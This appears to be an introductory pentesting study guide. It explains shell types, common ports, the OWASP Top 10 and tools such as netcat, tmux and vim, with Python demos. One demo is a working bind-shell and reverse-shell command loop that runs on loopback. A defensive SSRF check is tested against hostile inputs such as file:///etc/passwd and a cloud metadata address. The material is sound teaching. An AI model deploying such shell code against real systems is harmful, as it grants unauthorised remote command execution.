Pentesting Basics

Common Terms

Shell

  • On a Linux system, the shell is a program that takes input from the user via the keyboard and passes these commands to the operating system to perform a specific function.

  • Most Linux systems use a program called Bash (Bourne Again Shell) as a shell program to interact with the operating system.

  • Bash is an enhanced version of sh, the original Unix shell (the Bourne shell). Aside from Bash there are other shells, including but not limited to Zsh, Tcsh, Ksh and Fish.

  • "Getting a shell" on a box (system) means that the target host has been exploited and we have obtained shell-level access (typically bash or sh), so we can run commands interactively as if we were logged in to the host.

Types of Shell Connections

Reverse shell

Initiates a connection from the target back to a "listener" on our attack box. This is the most common type, because an outbound connection from the target is less likely to be blocked by a firewall than an inbound one.

Bind shell

"Binds" to a specific port on the target host and waits for a connection from our attack box. It requires that we can reach that port on the target, so inbound filtering often defeats it.

Web shell

Runs operating system commands via the web browser; typically not interactive, or only semi-interactive. It can also be used to run single commands (e.g., leveraging a file upload vulnerability to upload a PHP script that runs one command).

  • Each type of shell has its use case, and just as there are many ways to obtain a shell, the helper program we use to get one can be written in many languages (Python, Perl, Go, Bash, Java, awk, PHP, etc.).
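To make the direction of the two connection types concrete, here is an added example in Python (not code from the original page or from any tool it mentions). One minimal command loop plays the target side for both a bind shell and a reverse shell on 127.0.0.1; the attacker side either connects out to the listening target (bind) or listens first and waits for the target to connect back (reverse). The `__END__` sentinel, the helper names and the use of loopback are assumptions made for the demo; a real payload would normally hand the socket straight to /bin/sh.

```python
"""Bind shell vs reverse shell, both on 127.0.0.1 (added demo, not from the page)."""
import socket
import subprocess
import threading

HOST = "127.0.0.1"          # everything stays on loopback for the demo
END = b"\n__END__\n"        # sentinel so the attacker side knows a command finished


def run_shell_loop(conn: socket.socket) -> None:
    """Target side, shared by both shell types: read one command line, run it
    with /bin/sh, send the output back, until the peer sends 'exit'."""
    rfile = conn.makefile("rb")
    try:
        for line in rfile:
            cmd = line.decode(errors="replace").strip()
            if cmd == "exit":
                break
            proc = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
            conn.sendall(proc.stdout + proc.stderr + END)
    finally:
        rfile.close()
        conn.close()


def drive_shell(conn: socket.socket, commands: list[str]) -> list[str]:
    """Attacker side, shared by both shell types: send each command and collect
    its output. Returns one string per command, then tells the target to exit."""
    rfile = conn.makefile("rb")
    results = []
    try:
        for cmd in commands:
            conn.sendall(cmd.encode() + b"\n")
            chunks = []
            while True:
                line = rfile.readline()
                if not line or line == b"__END__\n":
                    break
                chunks.append(line)
            # drop the newline that run_shell_loop adds just before the sentinel
            results.append(b"".join(chunks)[:-1].decode(errors="replace"))
        conn.sendall(b"exit\n")
    finally:
        rfile.close()
    return results


def start_bind_shell() -> int:
    """Bind shell, target side: listen on a port and wait for the attacker.
    Port 0 lets the OS pick a free port; the chosen port is returned."""
    srv = socket.create_server((HOST, 0))
    port = srv.getsockname()[1]

    def accept_one() -> None:
        conn, _ = srv.accept()
        srv.close()
        run_shell_loop(conn)

    threading.Thread(target=accept_one, daemon=True).start()
    return port


def bind_shell_demo(commands: list[str]) -> list[str]:
    """Attacker side of a bind shell: we connect *to* the target
    (the equivalent of `nc <target-ip> <port>`)."""
    port = start_bind_shell()
    with socket.create_connection((HOST, port)) as conn:
        return drive_shell(conn, commands)


def reverse_shell_demo(commands: list[str]) -> list[str]:
    """Reverse shell: the attacker listens first (`nc -lvnp <port>`) and the
    target connects back, so the TCP connection originates from the target."""
    listener = socket.create_server((HOST, 0))
    port = listener.getsockname()[1]

    def connect_back() -> None:            # target side
        conn = socket.create_connection((HOST, port))
        run_shell_loop(conn)

    threading.Thread(target=connect_back, daemon=True).start()
    conn, _ = listener.accept()            # attacker side "catches" the shell
    listener.close()
    with conn:
        return drive_shell(conn, commands)


if __name__ == "__main__":
    print(bind_shell_demo(["echo bind", "id"]))
    print(reverse_shell_demo(["echo reverse", "uname -a"]))
```

Both demos return the same output for the same commands; the only thing that differs is which side called `connect` and which side called `listen`, which is exactly the property that decides whether a firewall between the two hosts lets the shell through.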

Port

  • A port can be thought of as a window or door on a house (the house being a remote system).

  • Ports are virtual points where network connections begin and end.

  • They are software-based and managed by the host operating system.

  • Ports are associated with a specific process or service and allow computers to differentiate between different traffic types.

  • Each port is assigned a number, and many are standardized across all network-connected devices (though a service can be configured to run on a non-standard port).

  • There are two categories of ports, Transmission Control Protocol (TCP), and User Datagram Protocol (UDP).

  • There are 65,535 TCP ports and 65,535 different UDP ports, each denoted by a number.

TCP

  • TCP is connection-oriented, meaning that a connection between a client and a server must be established before data can be sent.

UDP

  • UDP uses a connectionless communication model. There is no "handshake", which introduces a certain amount of unreliability, since there is no guarantee of data delivery or ordering.

  • UDP is useful when error correction/checking is either not needed or is handled by the application itself.

Common Ports

Port(s)         Protocol
20/21 (TCP)     FTP
22 (TCP)        SSH
23 (TCP)        Telnet
25 (TCP)        SMTP
80 (TCP)        HTTP
161 (UDP)       SNMP
389 (TCP/UDP)   LDAP
443 (TCP)       HTTPS (HTTP over SSL/TLS)
445 (TCP)       SMB
3389 (TCP)      RDP

  • It is essential for us, especially as pentesters, to have a firm grasp of many TCP and UDP ports and to be able to recognize them quickly from just their number.

  • This comes with practice and repetition, and eventually becomes second nature as we attack more boxes, labs, and real-world networks. It helps us work more efficiently and better prioritize our enumeration efforts and attacks.

Web Servers

  • A web server is an application that runs on the back-end server, handles all of the HTTP traffic from the client-side browser, routes each request to its destination page, and finally responds to the client-side browser.

  • Web servers usually run on TCP ports 80 or 443, and are responsible for connecting end-users to various parts of the web application, in addition to handling their various responses.

  • As web applications tend to be open for public interaction and facing the internet, they may lead to the back-end server being compromised if they suffer from any vulnerabilities.

  • Web applications can provide a vast attack surface, making them a high-value target for attackers and pentesters.

OWASP Top 10

  • We will often hear about/see references to the OWASP Top 10. This is a standardized list of the top 10 web application vulnerabilities maintained by the Open Web Application Security Project (OWASP).

  • These are considered the ten most critical web application security risks; the list is an awareness document, not an exhaustive catalogue of all possible web application vulnerabilities.

OWASP Top 10 (2021 edition):

1. Broken Access Control: Restrictions are not appropriately implemented to prevent users from accessing other users' accounts, viewing sensitive data, accessing unauthorized functionality, modifying data, etc.

2. Cryptographic Failures: Failures related to cryptography, which often lead to sensitive data exposure or system compromise.

3. Injection: User-supplied data is not validated, filtered, or sanitized by the application. Examples include SQL injection, command injection, LDAP injection, etc.

4. Insecure Design: Flaws that arise when the application is not designed with security in mind. A perfect implementation cannot fix them, because the required control was never designed in.

5. Security Misconfiguration: Missing appropriate security hardening across any part of the application stack, insecure default configurations, open cloud storage, or verbose error messages that disclose too much information.

6. Vulnerable and Outdated Components: Using components (both client-side and server-side) that are vulnerable, unsupported, or out of date.

7. Identification and Authentication Failures: Attacks that target users' identities, authentication, and session management.

8. Software and Data Integrity Failures: Code and infrastructure that do not protect against integrity violations, for example an application that relies on plugins, libraries, or modules from untrusted sources, repositories, and content delivery networks (CDNs) without verifying them.

9. Security Logging and Monitoring Failures: Without sufficient logging and monitoring, active breaches cannot be detected, escalated, or responded to.

10. Server-Side Request Forgery (SSRF): SSRF flaws occur whenever a web application fetches a remote resource without validating the user-supplied URL. An attacker can coerce the application into sending a crafted request to an unexpected destination, even one protected by a firewall, VPN, or another type of network access control list (ACL).
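Because the SSRF entry hinges on "validating the user-supplied URL", here is an added example of what that validation has to cover (example code written for this page, not OWASP's or any project's own). It rejects non-HTTP schemes and `user@host` tricks, resolves the hostname and refuses any address that is not globally routable, which catches loopback, RFC 1918 ranges, the 169.254.169.254 cloud metadata address and IPv4-mapped IPv6 forms. The `.example.test` hostnames and the `DEMO_DNS` table are constructed so the demo runs offline; `system_resolver` is what production code would pass instead.

```python
"""SSRF destination check for a URL the application intends to fetch (added demo)."""
import ipaddress
import socket
from typing import Callable
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}


def system_resolver(host: str) -> list[str]:
    """Resolve a hostname to all of its A/AAAA records via the OS resolver."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_public_address(addr: str) -> bool:
    """True only for addresses a public web server could legitimately have."""
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped        # ::ffff:127.0.0.1 is still loopback
    return ip.is_global            # excludes private, loopback, link-local, etc.


def check_fetch_target(url: str,
                       resolver: Callable[[str], list[str]] = system_resolver
                       ) -> tuple[bool, str]:
    """Return (allowed, reason) for a user-supplied URL."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "URL has no host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL (user@host trick)"
    try:
        ipaddress.ip_address(host)
        addrs = [host]             # literal IP: nothing to resolve
    except ValueError:
        try:
            addrs = resolver(host)  # also catches 0x7f000001-style spellings
        except OSError:
            return False, f"{host} does not resolve"
    if not addrs:
        return False, f"{host} has no addresses"
    for addr in addrs:             # every record must be public, not just the first
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, f"ok: {host} -> {', '.join(addrs)}"


# Constructed DNS table standing in for real resolution (hypothetical names).
DEMO_DNS = {
    "public.example.test": ["1.1.1.1"],
    "intranet.example.test": ["10.0.0.5"],
    "metadata.example.test": ["169.254.169.254"],
    "rebinding.example.test": ["1.1.1.1", "127.0.0.1"],
}


def demo_resolver(host: str) -> list[str]:
    """Offline stand-in for system_resolver that uses the constructed table."""
    if host not in DEMO_DNS:
        raise OSError(f"no such host: {host}")
    return DEMO_DNS[host]


if __name__ == "__main__":
    for url in ["http://public.example.test/report",
                "http://intranet.example.test/admin",
                "http://metadata.example.test/latest/meta-data/",
                "http://rebinding.example.test/",
                "http://127.0.0.1:8080/",
                "http://[::ffff:127.0.0.1]/",
                "file:///etc/passwd",
                "http://attacker.example.test@public.example.test/"]:
        print(f"{url:55s} {check_fetch_target(url, demo_resolver)}")
```

Two caveats a practitioner would add: the address checked here can differ from the one the HTTP client connects to a moment later (DNS rebinding), so the fetch should connect to the validated IP rather than re-resolving the name, and every redirect target must go through the same check. Where the set of legitimate destinations is known, an allow-list of hosts is stronger than this deny-list of address ranges.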

Basic Tools

SSH

  • Secure Shell (SSH) is a network protocol that runs on port 22 by default and provides users such as system administrators a secure way to access a computer remotely.

  • SSH can be configured with password authentication, or passwordless with public-key authentication using an SSH public/private key pair.

  • SSH uses a client-server model, connecting a user running an SSH client application such as OpenSSH to an SSH server.

  • Command: ssh <UserName>@<IP Address>

    • Example: ssh Bob@10.10.10.10

NetCat

  • Netcat (nc, or the Nmap project's ncat) is an excellent network utility for interacting with TCP/UDP ports.

  • It can be used for many things during a pentest, but its primary usage is for connecting to shells: as the listener for a reverse shell, or as the client for a bind shell.

  • Banner Grabbing Command: netcat <IP Address> <Port Number>

    • Example: netcat 10.10.10.10 22

    • The output is the banner of the service listening on that port, which tells us what is running (for port 22, for example, the SSH version string). Services such as HTTP do not speak first, so for those we have to send a request before anything comes back.

  • PowerCat is a Windows alternative to netcat written in PowerShell.

  • Another similar network utility is socat, which has a few features that netcat does not support, like forwarding ports and connecting to serial devices.
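The banner-grabbing step above in code, as an added example (written for this page, not netcat's or the original author's code). The `grab_banner` function does what `netcat <ip> <port>` does when you just watch the output, with a timeout so a silent service does not hang the scan and an optional probe for services that wait for the client to speak first. The two fake services are constructed on loopback so the example runs offline; their version strings are invented stand-ins.

```python
"""Banner grabbing over TCP, with constructed local services to grab from (added demo)."""
import socket
import threading

HOST = "127.0.0.1"


def grab_banner(host: str, port: int, probe: bytes = b"", timeout: float = 2.0) -> bytes:
    """Connect to host:port and return the first bytes the service sends.

    SSH, FTP and SMTP speak first, so an empty probe is enough. HTTP waits
    for the client, so pass a request as the probe or you will only see a
    timeout, which this function reports as b""."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            if probe:
                s.sendall(probe)
            try:
                return s.recv(1024)
            except socket.timeout:
                return b""
    except OSError:            # refused, unreachable, reset, ...
        return b""


# --- constructed services standing in for real hosts (demo only) ---

def _fake_ssh(srv: socket.socket) -> None:
    """Mimics sshd: sends its version string as soon as the client connects."""
    conn, _ = srv.accept()
    srv.close()
    with conn:
        conn.sendall(b"SSH-2.0-OpenSSH_9.6 constructed-demo\r\n")


def _fake_http(srv: socket.socket) -> None:
    """Mimics a web server: says nothing until it receives a request line."""
    conn, _ = srv.accept()
    srv.close()
    with conn:
        request = conn.recv(1024)
        if request.startswith((b"GET ", b"HEAD ")):
            conn.sendall(b"HTTP/1.0 200 OK\r\nServer: constructed-demo\r\n\r\n")


def start_fake_service(handler) -> int:
    """Start one fake service on a free loopback port and return that port."""
    srv = socket.create_server((HOST, 0))
    threading.Thread(target=handler, args=(srv,), daemon=True).start()
    return srv.getsockname()[1]


def demo() -> dict[str, bytes]:
    """Grab banners in the three situations a pentester meets most often."""
    return {
        "ssh": grab_banner(HOST, start_fake_service(_fake_ssh)),
        "http_no_probe": grab_banner(HOST, start_fake_service(_fake_http), timeout=0.5),
        "http_probed": grab_banner(HOST, start_fake_service(_fake_http),
                                   probe=b"HEAD / HTTP/1.0\r\n\r\n"),
    }


if __name__ == "__main__":
    for name, banner in demo().items():
        print(f"{name:14s} {banner!r}")
```

The silent HTTP case is the one that trips people up with netcat: an open port that prints nothing is not necessarily filtered or dead, it may simply be waiting for you to talk, which is why tools like nmap's version detection send protocol-specific probes.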

Tmux

  • Terminal multiplexers, like tmux or Screen, are great utilities for expanding a standard Linux terminal's features, like having multiple windows within one terminal and jumping between them.

  • To start using tmux, we type tmux in our terminal.

  • tmux key bindings are entered by pressing the prefix Ctrl + B, releasing it, and then pressing the command key.

    • For example, Ctrl + B then c opens a new window.

  • Useful commands (Ctrl + B followed by the key):

    • c: open a new window.

    • 0-9: switch to the window with that number.

    • %: split the current pane horizontally (Left and Right).

    • ": split the current pane vertically (Up and Down).

    • Arrow keys: move between split panes.

  • This cheatsheet is a very handy reference.

Vim

  • Vim is a great text editor that can be used for writing code or editing text files on Linux systems.

  • We usually find Vim or Vi installed on compromised Linux systems, so learning how to use it allows us to edit files even on remote systems.

  • Vim also has many other features, like extensions and plugins, which can significantly extend its usage and make for a great code editor.

  • Vim has several modes; the ones we need most are normal mode (navigating and editing with single-key commands), insert mode (typing text) and command-line mode (commands such as :w that are typed after a colon).

  • Once we open a file, we are in normal mode, which allows us to navigate and read the file without inserting text.

  • Commands:

    • vim <File Name>: opens a file.

    • i: starts insert mode.

    • Esc: exits insert mode, back to normal mode.

    • :: enters command-line mode from normal mode.

  • Commands (Normal Mode)

    Command   Description
    x         Cut (delete) the character under the cursor
    dw        Cut from the cursor to the end of the word
    dd        Cut the whole line
    yw        Copy (yank) from the cursor to the end of the word
    yy        Copy the whole line
    p         Paste after the cursor

  • Commands (Command-line Mode)

    Command   Description
    :1        Go to line number 1
    :w        Write (save) the file
    :q        Quit
    :q!       Quit without saving
    :wq       Write and quit

  • This cheatsheet is an excellent resource for further unlocking the power of Vim.
